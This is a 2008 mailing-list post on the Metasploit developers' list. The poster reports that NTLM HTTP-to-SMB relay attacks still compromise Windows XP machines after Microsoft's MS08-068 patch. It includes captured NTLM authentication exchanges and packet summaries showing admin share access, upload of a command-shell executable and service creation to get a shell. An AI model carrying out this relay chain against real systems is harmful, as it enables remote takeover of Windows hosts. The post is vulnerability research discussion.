-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ArcSighter Elite wrote:
> ArcSighter Elite wrote:
>> ArcSighter Elite wrote:
>>> H D Moore wrote:
>>>> On Monday 22 December 2008, ArcSighter Elite wrote:
>>>>> I came this morning with something. The MS08-67 patch when challenge
>>>>> keys couldn't be replayed, affects also the other variants of the
>>>>> attack, such as http 401 + WWW-Authenticate: NTLM, and the IMAP, POP
>>>>> and SMTP versions?
>>>> Supposedly it affects any component that initializes the security 
>>>> negotiation the "right" way, but only during a direct reflection attack. 
>>>> You can still relay to a third-party host regardless of protocol.
>>>> -HD
> 
> 
>>>> ------------------------------------------------------------------------
>>>> _______________________________________________
>>>> Framework-Hackers mailing list
>>>> Framework-Hackers@spool.metasploit.com
>>>> http://spool.metasploit.com/mailman/listinfo/framework-hackers
>>> Well, this is how we go.
>>> Before MS08-067:
>>> Windows XP SP2 Spanish:
>>> I totally owned. HTTP-based. No user intervention. No nothing. KIS2009
>>> doesn't block (find-socket).
>>> I totally owned SMB-SMB attack, UNC share.
>>> After MS08-067:
>>> I owned too! But this time I got a prompt asking for username and
>>> password; I mean, It doesn't automatically authenticate.
>>> The SMB-SMB attack doesn't spawn my shell.
> 
>>> Tell me what you think to proceed to XP SP3; although I think I will get
>>> the same results.
> 
>> Sorry about the typo, Is MS08-068 what I've applied not MS08-067-netapi.
>> It's the right patch, and the results are above.
> 
> Well, it surprisingly seems to work also in XP-Sp3 before and after the
> patch too, the interesting prompt about username/password authentication
> was my bad; i don' get prompt neither XP-SP3 nor XP-SP2; after I
> rebooted SP2.
> 
> 
> Here is what I've done (some hack in Python)
> 
> 1. Force browser to authenticate HTTP 401 + WWW-Authenticate: NTLM
> 
> Ex.:
> (Here *.*.*.1 is server, *.*.*.2 client)
> 
> GET / HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> application/x-shockwave-flash, application/vnd.ms-excel,
> application/vnd.ms-powerpoint, application/msword, */*
> Accept-Language: es
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
> Host: *.*.*.1
> Connection: Keep-Alive
> 
> HTTP/1.1 401 Unauthorized
> Content-Length: 0
> Content-Type: text/html
> Server: Microsoft-IIS/6.0
> WWW-Authenticate: NTLM
> Connection: keep-alive
> 
> GET / HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> application/x-shockwave-flash, application/vnd.ms-excel,
> application/vnd.ms-powerpoint, application/msword, */*
> Accept-Language: es
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
> Host: *.*.*.1
> Connection: Keep-Alive
> Authorization: NTLM TlR********AAB4IIogAAAAAAAAAAAAAAAAAAAAAFASgKAAAADw==
> 
> //-- Avoid null sesions
> 
> HTTP/1.1 401 Access Denied
> Server: Microsoft-IIS/6.0
> WWW-Authenticate: NTLM
> TlR********ABgAGADgAAAAHsgAA+vnrqY91YSEAAAAAAAAAACwALAA+AAAABQEoCgAAAA9XAFMAMgACAAYAVwBTADIAAQAGAFcAUwAyAAQABgB3AHMAMgADAAYAdwBzADIAAAAAAA==
> 
> Content-Length: 0
> Content-Type: text/html
> 
> GET / HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> application/x-shockwave-flash, application/vnd.ms-excel,
> application/vnd.ms-powerpoint, application/msword, */*
> Accept-Language: es
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
> Host: *.*.*.1
> Connection: Keep-Alive
> Authorization: NTLM
> TlR********AAAAGAAYAHwAAAAYABgAlAAAABQAFABIAAAAGgAaAFwAAAAGAAYAdgAAAAAAAACsAAAABYIAAgUBKAoAAAAPMQAwAC4AMQA1AC4AMwAuADgANgBBAGQAbQBpAG4AaQBzAHQAcgBhAGQAbwByAFcAUwAyADl4VTbp6F8qOXhVNunoXyo5eFU26ehfKrY5HrAdIbqrX4QPLLSy0y8RPgbMsVX5gg==
> 
> 
> HTTP/1.1 200 OK
> Content-Length: 92
> Connection: close
> 
> 2. The basic replay attack (wireshark summaries only):
> 
> //- Negotiating
> 513   10.025748       *.*.*.1         *.*.*.2
> SMB   Negotiate Protocol Request
> 
> 516   10.026712       *.*.*.1 *.*.*.2 SMB     Session Setup AndX Request,
> NTLMSSP_NEGOTIATE
> 
> /-- Authenticating
> 520   10.029566       *.*.*.1 *.*.*.2 SMB     Session Setup AndX Request,
> NTLMSSP_AUTH, User: WS2\Administrador
> 
> /-- Accessing IPC$
> 523   10.034183       *.*.*.1 *.*.*.2 SMB     Tree Connect AndX Request, Path:
> \\*.*.*.2\IPC$
> 
> /--Accesing admin$
> 531   10.040157       *.*.*.1 *.*.*.2 SMB     Tree Connect AndX Request, Path:
> \\*.*.*.2\admin$
> 
> /--Uploading exefile
> 533   10.041749       *.*.*.1 *.*.*.2 SMB     NT Create AndX Request, Path:
> \cmdshellsrv.exe
> 
> /--Accessing service control manager.
> 561   11.066248       *.*.*.1 *.*.*.2 SMB     NT Create AndX Request, FID: 
> 0x4000,
> Path: \svcctl
> 
> /-- well I got tired.
> The rest you already know: binding, OpenSCManager, OpenService,
> StartService => owning!
> 
> So please give another point of view, because what I've realized here is
> that MS didn't fix this properly!
> 
> Sincerely.
> 
> 
> 
> 
> 

Excuse me for the one-person chat in here.
But let me say that smb_relay of metasploit effectively fails after the
patch. We already know that, the curious thing is my python script doesn't.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJT/e1H+KgkfcIQ8cRAjfsAKD3yRwVgGblqWRTTRUUlr3EUSC5LACgyyiy
m+VB+AjtoSDmm3sJsum8jZ4=
=GHRB
-----END PGP SIGNATURE-----
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers

Reply via email to